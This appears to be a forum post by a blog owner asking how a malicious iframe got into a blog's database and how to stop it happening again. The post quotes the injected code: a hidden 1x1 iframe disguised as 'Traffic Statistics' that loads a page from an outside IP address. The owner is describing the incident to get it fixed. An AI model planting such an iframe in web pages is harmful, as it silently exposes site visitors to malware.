I run several blogs. I recently got an email from Google informing me some pages of one blog can cause users to be infected with malicious software. "Fortunately" this was the least important of the blogs.
On loading the blog into my browser and examining the HTML source I found <!-- Traffic Statistics --> <iframe src=http://220.127.116.11/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> had been inserted twice into the code. On examining the database I found this was actually inserted into the database entry.
Obviously I have now removed the offending code, but am concerned as to how this could have happened and how it might be prevented from happening in future.